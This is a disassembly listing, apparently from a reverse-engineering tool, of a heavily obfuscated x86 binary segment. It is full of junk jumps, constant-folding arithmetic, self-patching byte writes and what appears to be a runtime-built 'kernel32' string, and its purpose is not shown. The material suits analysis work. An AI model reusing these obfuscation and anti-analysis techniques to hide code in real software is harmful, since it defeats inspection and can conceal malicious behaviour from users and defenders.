; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_571. PRESS KEYPAD	"+" TO EXPAND]
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C3C0:				; CODE XREF: sub_48A195+17BDj
		jmp	near ptr dword_489E38+53h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0E9h, 23h, 0F0h
		dd 3487FFFFh, 240C8724h, 8159F18Bh, 2ABE4AC1h, 0EF4CE9E8h
		dd 0FFFFh, 0CCE90787h, 0FFFFF8h, 0FD8C0F00h, 81000013h
		dd 6BA917DBh, 1DEAC1B6h, 9CB2CB81h, 0E3E9973Eh,	13h, 2B0A5E68h
		dd 0DE2AE9B5h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C410:				; CODE XREF: sub_48A195+FEAj
		pop	ebx
		push	offset word_48C592
		jmp	near ptr dword_48A3FC+21h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C41D:				; CODE XREF: sub_48A195+2790j
		cmp	edi, 27BCBD06h
		jmp	loc_48CEEB
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C429:				; CODE XREF: sub_48A195+40C7j
		mov	ecx, [edi]
		jz	loc_48ED65

loc_48C431:				; CODE XREF: ss.cste0:loc_48E24Cj
		rol	edx, 16h
		xor	edx, 0A3470F5Eh
		add	edi, edx
		pop	edx
		jmp	near ptr dword_48A838+4Ah
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

locret_48C442:				; CODE XREF: ss.cste0:0048CAA5j
		retn
; ---------------------------------------------------------------------------
		align 4
dword_48C444	dd 0C68B5051h, 68240487h, 113B5246h, 0FFE037E9h
					; DATA XREF: ss.cste0:0048CAA0o
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_555. PRESS KEYPAD	"+" TO EXPAND]
		db 0E9h
		dd 0FFFFE0ABh, 1C94E9h
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_540. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_48D886

loc_48C464:				; CODE XREF: sub_48D886+9DFj
		jmp	loc_48CC27
; END OF FUNCTION CHUNK	FOR sub_48D886
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D04D

loc_48C46A:				; CODE XREF: sub_48D04D:loc_48D7CDj
		push	esi
		call	loc_48B193
		xchg	ebp, [esp+4+var_4]
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		call	sub_48E3C8
; END OF FUNCTION CHUNK	FOR sub_48D04D
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C484:				; CODE XREF: sub_48A195+37E3j
		jmp	loc_489CA7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0E9h, 0D8h, 0FAh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

locret_48C48F:				; CODE XREF: ss.cste0:0048BC29j
		retn
; ---------------------------------------------------------------------------
		dd 6C60000h, 241C8703h,	0E3C1F38Bh, 0ECDDE911h,	0EF2BFFFFh
		dd 4B6E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C150

loc_48C4AA:				; CODE XREF: sub_48C150+B3Ej
		push	1607E8B1h
		pop	ebx
		sub	ebx, 9E2792F4h
		add	ebx, 7A9B084Ch
		jmp	loc_48BBC0
; END OF FUNCTION CHUNK	FOR sub_48C150
; ---------------------------------------------------------------------------
		mov	byte ptr [edi],	5
		pop	edi
		add	edi, 41A4FDC5h
		xor	edi, 73911D9Fh
		call	sub_48E308
		mov	byte ptr [edi],	9Dh
		xchg	edx, [esp]
		mov	edi, edx
		pop	edx
		xor	eax, 24B673C7h
		jmp	loc_48C83B
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48C4EC	proc near		; CODE XREF: sub_48A195+F7Dp
					; ss.cste0:0048D196j
		xchg	edi, [esp+0]
		pop	edi
		push	offset sub_48D31B
		jmp	nullsub_581
sub_48C4EC	endp

; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_569. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h	; CODE XREF: ss.cste0:0048D0CBj
		dd 2E0h, 0F1810000h, 0AC899507h, 0B7E8CDBAh, 0FFFFFEh
					; CODE XREF: ss.cste0:loc_48D223j
		db 0
; ---------------------------------------------------------------------------

loc_48C515:				; DATA XREF: sub_48A195+16E2o
		push	edi
		mov	edi, 48BE13h
		jmp	loc_48C8EE
; ---------------------------------------------------------------------------
		dd 4F680000h, 0E97C3EC4h, 0FFFFD4C7h
		db 2 dup(0)
word_48C52E	dw 55E8h		; DATA XREF: sub_48A195+4511o
		dd 300000Ah, 240C87FBh,	3F38159h, 0E9A8AC8Eh, 0FFFFDF84h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_541. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48C545:				; CODE XREF: ss.cste0:0048D602j
		jmp	near ptr word_48B6FA+1
; ---------------------------------------------------------------------------
		db    0
		db    0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_552. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		jmp	locret_48DCB2
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C554:				; CODE XREF: sub_48A195+148j
		jmp	nullsub_544
; ---------------------------------------------------------------------------

loc_48C559:				; CODE XREF: sub_48A195:loc_48DCB5j
		xor	esi, 0A911AF8Ah
		add	esi, ebp
		push	offset byte_48ECA7
		jmp	near ptr dword_489F28+89h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFEBECh, 0FFDBAEE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C57A:				; CODE XREF: sub_48A195:loc_48B47Dj
		jz	loc_48CE82
		jmp	nullsub_533
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		mov	[edi], ecx
		test	edi, esi
		jmp	loc_48CE7C
; ---------------------------------------------------------------------------
		align 10h
		db 0, 0C3h
word_48C592	dw 0F181h		; DATA XREF: sub_48A195+227Co
		dd 48020896h, 7159C1ECh, 0FB685200h, 0E9B808EEh, 0FFFFD6F9h
		dd 0CD8B0000h, 15D0E9h,	0F6680000h, 0E90048CAh,	7D8h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BEE6

loc_48C5BD:				; CODE XREF: sub_48BEE6+10j
		add	edx, 0DAA46984h
		push	esi
		push	0A82C75E8h
		pop	esi
		jmp	loc_48DDCD
; END OF FUNCTION CHUNK	FOR sub_48BEE6
; ---------------------------------------------------------------------------
		align 10h
		dd 0D00E6800h, 26E90048h, 0FFFFDDh
dword_48C5DC	dd 4589C033h, 6CB951F4h, 0E90048C3h, 0FFFFF695h
					; DATA XREF: ss.cste0:00489E2Eo
		db 0
byte_48C5ED	db 68h,	5Ch, 79h	; DATA XREF: sub_48A195+3064o
		dd 8158935Ah, 2991CCF0h, 0C0F7C5h, 0E9001000h, 0FFFFDB32h
		dd 8C0F0000h, 0FFFFDC5Eh, 890F0000h, 0FFFFFA58h, 0E91AC0C1h
		dd 0FFFFDC47h, 0FE1B0000h, 0FFEC47E9h, 0E54E68FFh, 0CDE90048h
		dd 87FFFFE5h, 815E2434h, 5F9B47C0h, 2335E8B1h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48C63F:				; CODE XREF: ss.cste0:0048D314j
		jmp	loc_48E24C
; ---------------------------------------------------------------------------
		dd 51EC8B00h, 0E34A058Dh, 68570048h, 489BE9h, 0FFE9D2E9h
		dd 348700FFh, 8A9D5E24h, 0EB73E900h, 0FFFFh, 489D59BBh
		dd 0E105E900h, 2968FFFFh, 0E90048BDh, 0FFFFDE9Fh, 8706C600h
		dd 72F1815Eh, 56ED5779h, 61B2AC68h, 0EE815E90h,	0A0AD56DAh
		dd 0E904C6C1h, 0A59h, 318BC300h, 3B7E9h, 14870000h, 2C875A24h
		dd 87D08B24h
; ---------------------------------------------------------------------------
		adc	al, 24h
; START	OF FUNCTION CHUNK FOR sub_48CF58

loc_48C6B2:				; CODE XREF: sub_48CF58+D29j
		call	near ptr dword_48B23C+30h

loc_48C6B7:				; CODE XREF: ss.cste0:0048E31Fj
		jmp	nullsub_584
; END OF FUNCTION CHUNK	FOR sub_48CF58
; ---------------------------------------------------------------------------
		dd 0E3E90000h, 0FFFFFAh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489F18

loc_48C6C5:				; CODE XREF: sub_489F18:loc_48BD9Fj
		push	edi
		mov	edi, offset byte_48C35B
		jmp	loc_489D46
; END OF FUNCTION CHUNK	FOR sub_489F18
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C6D0:				; CODE XREF: sub_48A195+865j
		jz	loc_48A1B2
		rol	ebx, 8
		xchg	eax, [esp+18h+var_18]
		pop	eax
		add	ebx, ebp
		push	offset word_48EA66
		jmp	nullsub_555
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0), 33h
		dd 221FE9EEh, 0
		dd 0F04C7C1h, 0FFF6C882h, 4C6C1FFh, 0E9D1F799h,	0FFFFF6BDh
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48C70A	proc near		; CODE XREF: ss.cste0:0048DAF9p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0048E79F SIZE 00000010 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	esi, [esp-4+arg_0]
		mov	ecx, esi
		pop	esi
		xchg	ebx, [esp-8+arg_4]
		call	near ptr dword_489E38+91h
		mov	byte ptr [esi],	8Bh
		pop	esi
		push	eax
		push	51A09A6Ch
		pop	eax
		and	eax, 4AE3E0A4h
		sub	eax, 5EF5D5DEh
		rol	eax, 16h
		jmp	loc_48E79F
sub_48C70A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 8707C600h, 87CD8B5Fh, 0EC8B240Ch, 0E9E98B55h, 0FFFFEAA4h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C750:				; CODE XREF: sub_48A195+3FE7j
		jnz	loc_48D68D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		jmp	loc_48D0C3
; ---------------------------------------------------------------------------
		align 2
		shl	eax, 10h
		and	ebp, 157733E3h
		jmp	loc_48D687
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48C76D:				; DATA XREF: sub_48A195+3DFAo
		xchg	ecx, [esp]
		jmp	loc_48D1B7
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
; ---------------------------------------------------------------------------
		aas
		retn	48h
; ---------------------------------------------------------------------------
		dd 0FFE8DCE9h, 0FB8C0FFFh, 0E9000016h, 0FFFFF208h, 0E914E2C1h
		dd 16EBh, 0E9CD1B52h, 0FFFFD9F9h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C79C:				; CODE XREF: sub_48A195:loc_48B06Bj
		mov	byte ptr [edi],	87h
		pop	edi
		call	sub_48A195
		add	eax, 4
		push	edi
		call	sub_48E23D

loc_48C7AE:				; CODE XREF: sub_48A195+46A3j
		mov	byte ptr [ebx],	9
		pop	ebx
		push	offset byte_48BA5B
		jmp	nullsub_530
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C2E9

loc_48C7BC:				; CODE XREF: sub_48C2E9:loc_48DBEAj
		push	offset loc_48D936
		jmp	loc_48ABD2
; END OF FUNCTION CHUNK	FOR sub_48C2E9
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C7C7:				; CODE XREF: sub_48A195+1110j
		jno	near ptr dword_489788+1Ch
		xchg	ebx, [esp+18h+var_18]
		xchg	eax, [esp+18h+var_18]
		mov	ebx, eax
		pop	eax
		add	ecx, 96138B56h
		add	eax, ecx
		push	ebx
		jmp	loc_48DEC7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0FFFEBDE8h, 810F00FFh, 0FFFFF067h, 1128E9h, 840F0000h
		dd 0FFFFEFD3h, 5A241487h, 0D0C015FFh, 8B510045h, 0ED7EE9CAh
		dd 8700FFFFh, 0CB68241Ch, 5E3EA3D7h, 0E821C681h, 0FE81DDE9h
		dd 48497863h, 0FFD8D5E9h, 0C30000FFh

; =============== S U B	R O U T	I N E =======================================



sub_48C82C	proc near		; CODE XREF: sub_48A195+17D7j
					; ss.cste0:0048E853p

; FUNCTION CHUNK AT 0048C8E7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 0C08002BFh
		call	sub_48E2A9

loc_48C83B:				; CODE XREF: ss.cste0:0048C4E5j
		and	eax, 40F2E430h
		push	48A169h
		jmp	loc_48C8E7
sub_48C82C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 24048700h, 4C08358h,	0E8240487h, 2316h
		db 0
; ---------------------------------------------------------------------------

loc_48C85D:				; CODE XREF: ss.cste0:loc_48D169j
		or	eax, 28481B4Ah
		rol	eax, 18h
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C866:				; CODE XREF: sub_48A195+25Bj
		and	eax, 0B47698E6h
		sub	eax, 7D689246h
		xor	eax, 0E316B95Ah
		jmp	loc_48D7E1
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C87E:				; CODE XREF: sub_48A195+164Dj
		push	40355CCh
		pop	edi
		sub	edi, 281E8E76h
		xor	edi, 0DBE4C754h
		insd
		mov	dword ptr [edi+0Fh], 0FFE07B84h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0D64CE9FFh, 6800FFFFh, 48CD3Bh, 0FFDCF6E9h, 0B4E89CFFh
		dd 0FFFFE5h
; ---------------------------------------------------------------------------

loc_48C8B0:				; CODE XREF: ss.cste0:0048C381j
		jmp	loc_48B110
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 0FFEB52E9h, 0B6BB00FFh, 0E9FB86BDh, 0FFFFF888h, 0F303C781h
		db 0A2h, 9Eh

; =============== S U B	R O U T	I N E =======================================



sub_48C8CE	proc near		; CODE XREF: ss.cste0:0048CF7Dp
		xchg	edx, [esp+0]
		pop	edx
		mov	dword ptr [ebp-18h], 6E72656Bh
		jmp	loc_48B4BE
sub_48C8CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C8E0:				; CODE XREF: sub_48A195:loc_48E142j
		call	sub_48C2E9
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C82C

loc_48C8E7:				; CODE XREF: sub_48C82C+1Aj
		jmp	nullsub_578
; END OF FUNCTION CHUNK	FOR sub_48C82C
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C8EE:				; CODE XREF: ss.cste0:0048C51Bj
		jmp	near ptr dword_489DE8+0Ch
; ---------------------------------------------------------------------------
		align 4
		dd 1F048D0Fh, 23000000h, 880F5BD1h, 0FFFFD400h,	1EF5E9h
		dd 0CD810000h, 59599A6h, 0FFEDD3E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C915:				; CODE XREF: sub_48A195+13B9j
		jz	loc_48C333
		add	[ecx+eax*4+3B70AFF0h], bl
		xchg	eax, ecx
		not	esi
		jmp	loc_48C41D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFE5AD8Eh, 240487FFh, 0C301C658h, 0D22AE959h, 0C3FFFFh
		dd 0CFC08100h, 50150010h, 0F0DCE98Eh, 0C87FFFFh, 68535924h
		dd 0B5FFC1A1h, 0FFDBABE9h, 9D0000FFh

; =============== S U B	R O U T	I N E =======================================



sub_48C960	proc near		; CODE XREF: ss.cste0:loc_48E4ADp
		xchg	ecx, [esp+0]
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		jmp	near ptr dword_48AAC4+57h
sub_48C960	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0E7C1h
		dd 241C8715h, 0E968565Bh, 5E85B404h, 6BC6F681h,	0A4E96102h
		dd 0FFFFD6h, 2EEFF381h,	0FB87578Bh, 0F5BE8A0Fh,	0A7E9FFFFh
		dd 0FFFFE7h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C99C:				; CODE XREF: sub_48A195:loc_48DD66j
		call	sub_48E438
		jmp	loc_48E477
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFE7C388h, 0E8AE9FFh, 0
		dd 5A9D02C6h, 5FE2815Ah, 812ABF75h, 8F0218EAh, 2ACA81ACh
		dd 0E9154DA1h, 0FFFFF126h
; ---------------------------------------------------------------------------

loc_48C9D0:				; CODE XREF: ss.cste0:00489914j
		shr	ebp, 18h
		jnz	loc_48DD82
		jmp	loc_48EA1F
; ---------------------------------------------------------------------------
		align 10h
		dd 5B77ED81h, 12E9C9C6h, 0FFFFF7h, 8701C600h, 87CD8B59h
		dd 0EE8B2434h, 2414AD5Eh, 0FFEC6CE9h, 243C87FFh, 0E8108B5Fh
		dd 14A8h, 0FFF282E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_562. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 0FFD2FBE9h
		db 0FFh, 0
word_48CA1A	dw 6851h		; DATA XREF: sub_48A195+113Eo
		dd 7C35C96Ch, 0D582B951h, 82E90048h, 0FFFFD6h, 0E4DA800Fh
		dd 64E9FFFFh, 0FFFFD8h,	0FA32E9C3h, 0FFFFh, 0E999D6F7h
		dd 0FFFFF2D2h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_529. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48E5CF

loc_48CA4A:				; CODE XREF: sub_48E5CF+Aj
		jmp	loc_48ACD3
; END OF FUNCTION CHUNK	FOR sub_48E5CF
; ---------------------------------------------------------------------------
		align 10h
		dd 8DD3CF81h, 0A0E904F2h, 0FFFFF8h, 5E68EB2Bh, 0E90048E3h
		dd 0FFFFDA5Ah, 0D7850000h, 1AF4E9h, 1C60000h, 242C8787h
		dd 8B5DCD8Bh, 243428F2h, 48C7A568h, 2CDE900h, 0
; ---------------------------------------------------------------------------

loc_48CA8C:				; CODE XREF: ss.cste0:0048CC42j
		mov	byte ptr [eax],	0FCh
		pop	eax
		call	sub_48D6EB
		mov	byte ptr [eax],	87h
		pop	eax
		push	ebp
		pop	ebx
		xchg	ebx, [esp]
		mov	ebp, esp
		push	offset dword_48C444
		jmp	locret_48C442
; ---------------------------------------------------------------------------
		dw 1487h
		dd 0C0815A24h, 8A827F43h, 87C88B51h, 6850240Ch,	5ED4BF9Ch
		dd 0FFEFAAE9h, 815800FFh, 1EB19FEEh, 6EC681F3h,	0C11C6EB9h
		dd 0C6811EC6h, 0E6C460FAh, 0E9243487h, 14CAh
; ---------------------------------------------------------------------------

loc_48CAE4:				; CODE XREF: ss.cste0:00489780j
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_48CAE5	proc near
		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		mov	eax, offset dword_48B608
		jmp	loc_48A971
sub_48CAE5	endp

; ---------------------------------------------------------------------------
		dd 3C60000h, 242C8787h,	685DDD8Bh, 0DC741D42h, 56AE95Fh
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48CB0B:				; CODE XREF: ss.cste0:0048C295j
		xchg	edi, [esp]
		pop	edi
		add	ebx, 785B3FF5h
		xchg	ebx, [esp]
		jmp	loc_48BF20
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------

loc_48CB1F:				; CODE XREF: ss.cste0:loc_48BF20j
		push	eax
		mov	eax, ebx
		jmp	near ptr dword_489C18+52h
; ---------------------------------------------------------------------------
		align 4
		dd 0C300h
; ---------------------------------------------------------------------------

loc_48CB2C:				; CODE XREF: ss.cste0:0048E6B7j
		jmp	locret_48DE46
; ---------------------------------------------------------------------------
		db 2 dup(0), 9Ch
		dd 0C66A3168h, 0EAE958B8h, 0FFFFD5h, 1487128Bh,	10F7E924h
		dd 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CB4C:				; CODE XREF: sub_48A195:loc_48AFFEj
		push	edi
		push	ebx
		mov	ebx, offset byte_48A69B
		jmp	loc_48CCBA
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_572. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E3C8

loc_48CB5B:				; CODE XREF: sub_48E3C8+18j
		jmp	loc_48BBB4
; END OF FUNCTION CHUNK	FOR sub_48E3C8
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CB62:				; CODE XREF: sub_48A195+34EBj
		jmp	loc_48CE34
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 598701C6h, 3DB8C881h, 0F08132A7h, 3946959Dh,	6805C0C1h
		dd 48DD8Ch, 0FFF8D2E9h,	243C87FFh, 0C15FF78Bh, 0DDE902C6h
		dd 0FFFFD9h, 680000C3h,	0DF527827h, 86F2815Ah, 81B18E8Fh
		dd 0F8510EE2h, 0E5EA811Eh, 8167E6A1h, 0F181BCCAh, 1AC281F1h
		dd 0E90856F9h, 0FFFFCCE1h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C0E7

loc_48CBC0:				; CODE XREF: sub_48C0E7+5j
		mov	byte ptr [ebx],	0Fh
		pop	ebx
		pop	ecx
		call	sub_48DB68
; END OF FUNCTION CHUNK	FOR sub_48C0E7
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CBCB:				; CODE XREF: sub_48A195+34D7j
		jmp	near ptr dword_4898F4+19h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CBD2:				; CODE XREF: sub_48A195+B53j
		xor	eax, 0ED9A49BBh
		add	eax, 764F2E61h

loc_48CBDE:				; DATA XREF: sub_48E5CF+5o
		sahf
		add	al, 24h
		jmp	loc_48CBF2
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0C300h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE1E

loc_48CBE8:				; CODE XREF: sub_48CE1E+11j
		jmp	loc_48C174
; END OF FUNCTION CHUNK	FOR sub_48CE1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CBED:				; CODE XREF: sub_48A195+121Ej
		jmp	near ptr dword_48AFC8+2
; ---------------------------------------------------------------------------

loc_48CBF2:				; CODE XREF: sub_48A195+2A4Cj
		push	ecx
		call	sub_48DD0E
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE7A

loc_48CBF9:				; CODE XREF: sub_48BE7A-305j
		jmp	loc_489FFE
; END OF FUNCTION CHUNK	FOR sub_48BE7A
; ---------------------------------------------------------------------------
		align 10h
		dd 0E6B870Fh, 1CE90000h
		db 0D3h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_549. PRESS KEYPAD	"+" TO EXPAND]
dword_48CC0C	dd 0CD27C181h		; DATA XREF: sub_48A195+3C1Ao
		db 0A0h, 0
word_48CC12	dw 0C1EBh		; DATA XREF: sub_48A195+2091o
		dd 0F9840F59h, 68FFFFDCh, 48E93Ah, 0FFDF47E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D886

loc_48CC27:				; CODE XREF: sub_48D886:loc_48C464j
		mov	eax, esi
		xchg	eax, [esp+0]
		mov	esi, offset dword_48D608
		jmp	loc_48DFA7
; END OF FUNCTION CHUNK	FOR sub_48D886
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, edx
		xchg	eax, [esp]
		push	eax
		mov	eax, 489859h
		jmp	loc_48CA8C
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CC48:				; CODE XREF: sub_48A195:loc_48AA4Dj
		xchg	edi, [esp-8+arg_4]
		jmp	nullsub_540
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, 48C50Ch
		jmp	loc_48AE1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CC5B:				; CODE XREF: sub_48A195:loc_48B29Ej
		mov	eax, offset loc_48A9CA
		jmp	near ptr dword_489788+33h
; END OF FUNCTION CHUNK	FOR sub_48A195
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_530. PRESS KEYPAD	"+" TO EXPAND]
		dw 6800h
		dd offset dword_48B3D0+8
		dd 0FFE766E9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_570. PRESS KEYPAD	"+" TO EXPAND]
		dw 0C081h
		dd 8FAF0F71h, 0FFD2F9E8h, 0C60000FFh, 0C879C02h, 59D18B24h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C150

loc_48CC88:				; CODE XREF: sub_48C150+Fj
		push	ecx
		mov	ecx, ebx
		xchg	ecx, [esp+0]
		jmp	loc_48C4AA
; END OF FUNCTION CHUNK	FOR sub_48C150
; ---------------------------------------------------------------------------
		align 4
		dd 0B2E99C00h, 0FFFFFBh, 0A7840F00h, 87FFFFCFh,	875A2414h
		dd 0EF8B243Ch, 8B240487h, 720E9F8h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48CCB6:				; CODE XREF: ss.cste0:loc_48BC7Aj
		retn
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_554. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48CCBA:				; CODE XREF: sub_48A195+29BEj
		jmp	loc_48A695
; END OF FUNCTION CHUNK	FOR sub_48A195

; =============== S U B	R O U T	I N E =======================================



sub_48CCBF	proc near		; CODE XREF: sub_48D91D+14p
		xchg	eax, [esp+0]
		pop	eax
		add	ebx, 0D309E96Bh
		jmp	near ptr dword_489E38+0D2h
sub_48CCBF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		ror	esi, 1Dh
		jmp	loc_48D5FA
; ---------------------------------------------------------------------------
		sub	edx, 607153BFh
		push	48AE50h
		jmp	locret_48D161
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 97084h, 0E0DE900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CCF2:				; CODE XREF: ss.cste0:0048A190j
		pop	esi
		xchg	eax, [esp]
		push	eax
		pop	ebp
		jmp	loc_48D228
; ---------------------------------------------------------------------------
		db 0C1h, 0CAh, 9
		dd 0FFDC22E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48CD05:				; DATA XREF: sub_48A195+126Eo
		push	ecx
		push	0EF8A7681h
		pop	ecx
		or	ecx, 0D17E534Ah
		rol	ecx, 14h
		add	ecx, 3E9CD4CEh
		jmp	loc_48D223
; ---------------------------------------------------------------------------
		dd 0E900C300h, 0FFFFF0EBh, 0DAFE8A0Fh, 2BE9FFFFh, 0FFFFD3h
		dd 1A13E95Bh, 51000000h, 48CFF8B9h, 1D87E900h, 0
		dd 10E9F533h, 0FFFFD6h,	0CC7E850Fh, 0E900FFFFh,	0FFFFE63Dh
